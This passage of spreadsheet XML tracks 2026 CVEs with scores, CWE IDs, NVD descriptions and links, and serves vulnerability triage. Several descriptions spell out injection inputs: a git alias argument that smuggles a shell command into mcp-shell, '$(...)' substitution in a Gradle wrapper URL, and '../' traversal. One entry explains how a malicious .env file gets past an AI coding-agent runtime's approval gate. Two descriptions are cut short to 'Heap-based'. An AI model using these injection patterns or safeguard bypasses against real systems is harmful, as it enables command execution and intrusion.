        </is>
      </c>
      <c r="J1603" s="5" t="inlineStr"/>
      <c r="K1603" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1603" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default security.yaml allows /usr/bin/git, while security.go omits ! from containsShellMetacharacters and containsDangerousShellConstructs and applies no per-executable argument policy. A caller of the shell_exec MCP tool can provide the command argument /usr/bin/git -c alias.pwn=!&lt;arbitrary-command&gt;, causing Git to create a shell alias and execute arbitrary OS commands as the mcp-shell process user. The default Docker image runs as mcpuser with Git installed and secure mode enabled, so the bypass is exploitable in the default deployment without additional authentication beyond MCP connectivity. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M1603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55582</t>
        </is>
      </c>
    </row>
    <row r="1604">
      <c r="A1604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57159</t>
        </is>
      </c>
      <c r="C1604" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1604" s="5" t="inlineStr"/>
      <c r="F1604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1604" s="5" t="inlineStr"/>
      <c r="H1604" s="5" t="inlineStr"/>
      <c r="I1604" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1604" s="5" t="inlineStr"/>
      <c r="K1604" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L1604" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 673b978, a remote out-of-bounds read and write can occur in the SDP negotiator when the remote payload-type map maintenance feature is enabled. assign_pt_and_update_map() in pjmedia/src/pjmedia/sdp_neg.c uses payload-type numbers taken from a remote SDP offer or answer to index fixed-size internal tables without sufficient bounds validation, so a crafted remote SDP can cause memory access outside those tables. The practical impact is memory corruption and denial of service; code execution is not demonstrated. This path is only reached when PJMEDIA_SDP_NEG_MAINTAIN_REMOTE_PT_MAP is enabled. The default is disabled, so default builds are not affected; the feature is an interoperability option that integrating products may enable. This issue has been patched via commit 673b978.</t>
        </is>
      </c>
      <c r="M1604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57159</t>
        </is>
      </c>
    </row>
    <row r="1605">
      <c r="A1605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57432</t>
        </is>
      </c>
      <c r="C1605" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1605" s="5" t="inlineStr"/>
      <c r="F1605" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1605" s="5" t="inlineStr"/>
      <c r="H1605" s="5" t="inlineStr">
        <is>
          <t>perl:perl</t>
        </is>
      </c>
      <c r="I1605" s="5" t="inlineStr">
        <is>
          <t>2026-07-13</t>
        </is>
      </c>
      <c r="J1605" s="5" t="inlineStr"/>
      <c r="K1605" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L1605" s="5" t="inlineStr">
        <is>
          <t>Perl versions before 5.40.5-RC1, from 5.41.0 before 5.42.3-RC1, from 5.43.0 before 5.43.11 have an integer overflow in S_measure_struct leading to an out-of-bounds heap read in pack and unpack.
S_measure_struct adds each item's size times its repeat count to a running total with no overflow check, so a large repeat count in a pack or unpack template wraps the signed SSize_t total negative. The @, X, and x position codes then guard their moves with a signed length comparison that passes when the length is negative, advancing the buffer pointer out of bounds.
A template derived from untrusted input can read heap memory past the buffer and return it to the caller.</t>
        </is>
      </c>
      <c r="M1605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57432</t>
        </is>
      </c>
    </row>
    <row r="1606">
      <c r="A1606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63388</t>
        </is>
      </c>
      <c r="C1606" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1606" s="5" t="inlineStr"/>
      <c r="F1606" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1606" s="5" t="inlineStr"/>
      <c r="H1606" s="5" t="inlineStr"/>
      <c r="I1606" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1606" s="5" t="inlineStr"/>
      <c r="K1606" s="5" t="inlineStr">
        <is>
          <t>CWE-617, CWE-787</t>
        </is>
      </c>
      <c r="L1606" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has a heap out-of-bounds write in bufferevent_sock.c when bufferevent_socket_set_conn_address_ copies a kernel-supplied AF_UNIX peer address into bufferevent_private.conn_address. Release builds compiled with NDEBUG disable the EVUTIL_ASSERT length guard, and the evhttp accept path can pass a 110-byte sockaddr from accept() into the 28-byte field. An unauthenticated local peer able to connect to an AF_UNIX listener can overwrite the adjacent dns_request pointer and heap data, causing memory corruption with confidentiality, integrity, and availability impact. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M1606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63388</t>
        </is>
      </c>
    </row>
    <row r="1607">
      <c r="A1607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64657</t>
        </is>
      </c>
      <c r="C1607" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1607" s="5" t="inlineStr"/>
      <c r="F1607" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1607" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1607" s="5" t="inlineStr"/>
      <c r="I1607" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1607" s="5" t="inlineStr"/>
      <c r="K1607" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1607" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.19, the PostgreSQL datasource connector in packages/server/src/integrations/postgres.ts interpolates the user-controlled schema configuration field into a SET search_path statement without escaping embedded double quotes, allowing an authenticated administrator who saves or tests the datasource to execute arbitrary SQL through the simple query protocol. This issue is fixed in version 3.39.19.</t>
        </is>
      </c>
      <c r="M1607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64657</t>
        </is>
      </c>
    </row>
    <row r="1608">
      <c r="A1608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66065</t>
        </is>
      </c>
      <c r="C1608" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1608" s="5" t="inlineStr"/>
      <c r="F1608" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1608" s="5" t="inlineStr"/>
      <c r="H1608" s="5" t="inlineStr"/>
      <c r="I1608" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1608" s="5" t="inlineStr"/>
      <c r="K1608" s="5" t="inlineStr">
        <is>
          <t>CWE-15, CWE-94</t>
        </is>
      </c>
      <c r="L1608" s="5" t="inlineStr">
        <is>
          <t>Ouroboros is a local-first runtime for AI coding agents that records their actions and applies user-defined policies to constrain behavior. Versions prior to 0.42.1 have an incomplete denylist. Several execution-routing keys of the same RCE class were omitted, so a malicious cloned repo can still reach arbitrary command execution by shipping a .env (auto-loaded at import, with no review step). The CVE-2026-47211 fix added _UNTRUSTED_ENV_DENYLIST to stop an untrusted project-directory .env from redirecting execution, but it did not account for all keys. The backend config-home and MCP/plugin roots bypass the approval gate by pointing the nested agent, MCP servers, and plugin roster at attacker config. Other variables re-enable blocked local transports, replace sub-agent prompts, switch backends, and lower tool approval classes, further weakening the approval gate. This issue has been fixed in version 0.42.1.</t>
        </is>
      </c>
      <c r="M1608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66065</t>
        </is>
      </c>
    </row>
    <row r="1609">
      <c r="A1609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67986</t>
        </is>
      </c>
      <c r="C1609" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1609" s="5" t="inlineStr"/>
      <c r="F1609" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1609" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1609" s="5" t="inlineStr"/>
      <c r="I1609" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1609" s="5" t="inlineStr"/>
      <c r="K1609" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1609" s="5" t="inlineStr">
        <is>
          <t>amazing-print/amazing_print at commit dc890dfafdf07088ea901df53c19c2710e5c5234 contains a Ruby code injection condition in AwesomeMethodArray#grep. A specially named method containing Ruby interpolation syntax can be interpolated into a dynamically constructed eval string when grep is called with a block, resulting in Ruby code execution in the host process. Exploitation requires an application path that allows an attacker to influence dynamic method names.</t>
        </is>
      </c>
      <c r="M1609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67986</t>
        </is>
      </c>
    </row>
    <row r="1610">
      <c r="A1610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="C1610" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1610" s="5" t="inlineStr"/>
      <c r="F1610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1610" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1610" s="5" t="inlineStr"/>
      <c r="I1610" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1610" s="5" t="inlineStr"/>
      <c r="K1610" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1610" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="1611">
      <c r="A1611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="C1611" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1611" s="5" t="inlineStr"/>
      <c r="F1611" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1611" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1611" s="5" t="inlineStr"/>
      <c r="I1611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1611" s="5" t="inlineStr"/>
      <c r="K1611" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1611" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="1612">
      <c r="A1612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72734</t>
        </is>
      </c>
      <c r="C1612" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1612" s="5" t="inlineStr"/>
      <c r="F1612" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1612" s="5" t="inlineStr"/>
      <c r="H1612" s="5" t="inlineStr"/>
      <c r="I1612" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1612" s="5" t="inlineStr"/>
      <c r="K1612" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1612" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.28.7 until 0.29.13, the server.remove tRPC mutation in apps/dokploy/server/api/routers/server.ts accepts a caller-controlled serverId and calls haveActiveServices, findServerById, removeDeploymentsByServerId, and deleteServer without verifying that currentServer.organizationId equals ctx.session.activeOrganizationId. An authenticated owner or administrator with server:delete in one organization who previously observed another organization's serverId can delete that organization's server registration and deployment records, interrupt Dokploy management, and receive the associated plaintext SSH private key even though server.one denies the same cross-organization read. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72734</t>
        </is>
      </c>
    </row>
    <row r="1613">
      <c r="A1613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73076</t>
        </is>
      </c>
      <c r="C1613" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1613" s="5" t="inlineStr"/>
      <c r="F1613" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1613" s="5" t="inlineStr"/>
      <c r="H1613" s="5" t="inlineStr"/>
      <c r="I1613" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1613" s="5" t="inlineStr"/>
      <c r="K1613" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L1613" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0847, runtime/autoload/vimball.vim allows a crafted vimball member named .VimballRecord to overwrite the installation record with attacker-chosen commands. When vimball#RmVimball() later processes the matching record entry, the stored Ex commands, including operating-system commands invoked through :!, execute with the privileges of the user running Vim. This issue is fixed in version 9.2.0847.</t>
        </is>
      </c>
      <c r="M1613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73076</t>
        </is>
      </c>
    </row>
    <row r="1614">
      <c r="A1614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73077</t>
        </is>
      </c>
      <c r="C1614" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1614" s="5" t="inlineStr"/>
      <c r="F1614" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1614" s="5" t="inlineStr"/>
      <c r="H1614" s="5" t="inlineStr"/>
      <c r="I1614" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1614" s="5" t="inlineStr"/>
      <c r="K1614" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1614" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0839, the runtime/ftplugin/sh.vim, runtime/ftplugin/zsh.vim, and runtime/ftplugin/ps1.vim filetype plugins pass attacker-controlled Visual-mode selections from K through keywordprg commands without safely separating shell arguments. fnameescape() and PATH_ESC_CHARS do not neutralize shell metacharacters before ShKeywordPrg, ZshKeywordPrg, or GetHelp invokes bash, zsh, or PowerShell, allowing arbitrary operating-system commands to execute with the privileges of the user running Vim. This issue is fixed in version 9.2.0839.</t>
        </is>
      </c>
      <c r="M1614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73077</t>
        </is>
      </c>
    </row>
    <row r="1615">
      <c r="A1615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73629</t>
        </is>
      </c>
      <c r="C1615" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1615" s="5" t="inlineStr"/>
      <c r="F1615" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1615" s="5" t="inlineStr"/>
      <c r="H1615" s="5" t="inlineStr"/>
      <c r="I1615" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1615" s="5" t="inlineStr"/>
      <c r="K1615" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1615" s="5" t="inlineStr">
        <is>
          <t>Serendipity before 2.6.0 contains a server-side request forgery vulnerability in the serendipity_url_allowed() filter that fails to block hex-encoded IPv4 addresses, IPv6 literals, and link-local ranges. Authenticated users with adminImagesAdd permission can bypass the filter using alternate address formats to request internal services and retrieve response bodies through the public uploads directory.</t>
        </is>
      </c>
      <c r="M1615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73629</t>
        </is>
      </c>
    </row>
    <row r="1616">
      <c r="A1616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75060</t>
        </is>
      </c>
      <c r="C1616" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1616" s="5" t="inlineStr"/>
      <c r="F1616" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1616" s="5" t="inlineStr"/>
      <c r="H1616" s="5" t="inlineStr">
        <is>
          <t>jetbrains:pycharm</t>
        </is>
      </c>
      <c r="I1616" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1616" s="5" t="inlineStr"/>
      <c r="K1616" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1616" s="5" t="inlineStr">
        <is>
          <t>In JetBrains PyCharm before 2026.2.1 code execution was possible via unauthenticated Jupyter MCP tools</t>
        </is>
      </c>
      <c r="M1616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75060</t>
        </is>
      </c>
    </row>
    <row r="1617">
      <c r="A1617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75855</t>
        </is>
      </c>
      <c r="C1617" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1617" s="5" t="inlineStr"/>
      <c r="F1617" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1617" s="5" t="inlineStr"/>
      <c r="H1617" s="5" t="inlineStr"/>
      <c r="I1617" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1617" s="5" t="inlineStr"/>
      <c r="K1617" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1617" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions before 26.8.1 fail to sanitize database names in the POST /api/v1/server endpoint's create database and drop database commands, allowing authenticated root users to write and delete arbitrary files outside the configured database directory. Attackers can supply database names containing ../ sequences to create databases at arbitrary filesystem paths or recursively delete directories the server process can access.</t>
        </is>
      </c>
      <c r="M1617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75855</t>
        </is>
      </c>
    </row>
    <row r="1618">
      <c r="A1618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75999</t>
        </is>
      </c>
      <c r="C1618" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1618" s="5" t="inlineStr"/>
      <c r="F1618" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1618" s="5" t="inlineStr"/>
      <c r="H1618" s="5" t="inlineStr"/>
      <c r="I1618" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1618" s="5" t="inlineStr"/>
      <c r="K1618" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1618" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t>
        </is>
      </c>
    </row>
    <row r="1619">
      <c r="A1619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76228</t>
        </is>
      </c>
      <c r="C1619" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1619" s="5" t="inlineStr"/>
      <c r="F1619" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1619" s="5" t="inlineStr"/>
      <c r="H1619" s="5" t="inlineStr"/>
      <c r="I1619" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1619" s="5" t="inlineStr"/>
      <c r="K1619" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1619" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;=32.124.0 and before 42.68.5 (and Mend renovate-ce/renovate-ee before 13.3.0) contain a command injection vulnerability in Gradle Wrapper artifact handling. When Renovate processes Gradle Wrapper updates, it invokes a wrapper update command via a shell (e.g. /bin/sh -c ... ./gradlew :wrapper --gradle-distribution-url &lt;value&gt;). If an attacker supplies a malicious gradle-wrapper.properties whose distributionUrl contains shell command substitution syntax such as $(...), the shell evaluates it before Gradle parses the URL, resulting in arbitrary command execution in the Renovate runtime. Exploitation requires the attacker to introduce the malicious file into a repository that Renovate scans; the issue occurs even when allowScripts is disabled.</t>
        </is>
      </c>
      <c r="M1619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76228</t>
        </is>
      </c>
    </row>
    <row r="1620">
      <c r="A1620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76229</t>
        </is>
      </c>
      <c r="C1620" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1620" s="5" t="inlineStr"/>
      <c r="F1620" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1620" s="5" t="inlineStr"/>
      <c r="H1620" s="5" t="inlineStr"/>
      <c r="I1620" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1620" s="5" t="inlineStr"/>
      <c r="K1620" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1620" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 39.218.0 before 40.33.0 contain an arbitrary command injection vulnerability in the kustomize manager where user-provided chart names are appended to helm pull commands without proper sanitization. Attackers with repository write access can craft malicious kustomization.yaml files with specially crafted chart names to execute arbitrary commands on the Renovate host machine.</t>
        </is>
      </c>
      <c r="M1620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76229</t>
        </is>
      </c>
    </row>
    <row r="1621">
      <c r="A1621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76230</t>
        </is>
      </c>
      <c r="C1621" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1621" s="5" t="inlineStr"/>
      <c r="F1621" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1621" s="5" t="inlineStr"/>
      <c r="H1621" s="5" t="inlineStr"/>
      <c r="I1621" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1621" s="5" t="inlineStr"/>
      <c r="K1621" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1621" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 35.63.0 before 40.33.0 contain a command injection vulnerability in the npm manager where user-provided packageName values are appended to npm install commands without proper sanitization. Attackers with repository write access can craft malicious Renovate configuration files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76230</t>
        </is>
      </c>
    </row>
    <row r="1622">
      <c r="A1622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76231</t>
        </is>
      </c>
      <c r="C1622" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1622" s="5" t="inlineStr"/>
      <c r="F1622" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1622" s="5" t="inlineStr"/>
      <c r="H1622" s="5" t="inlineStr"/>
      <c r="I1622" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1622" s="5" t="inlineStr"/>
      <c r="K1622" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1622" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 32.135.0 before 40.33.0 contain a command injection vulnerability in the hermit manager where user-provided dependency names are appended to install and uninstall commands without proper sanitization. Attackers with repository write access can provide maliciously named hermit dependencies to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76231</t>
        </is>
      </c>
    </row>
    <row r="1623">
      <c r="A1623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76232</t>
        </is>
      </c>
      <c r="C1623" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1623" s="5" t="inlineStr"/>
      <c r="F1623" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1623" s="5" t="inlineStr"/>
      <c r="H1623" s="5" t="inlineStr"/>
      <c r="I1623" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1623" s="5" t="inlineStr"/>
      <c r="K1623" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1623" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 31.51.0 before 40.33.0 contain a command injection vulnerability in the helmv3 manager where the repository parameter is appended to helm registry login commands without proper sanitization. Attackers with repository write access can craft malicious Chart.yaml files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="M1623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76232</t>
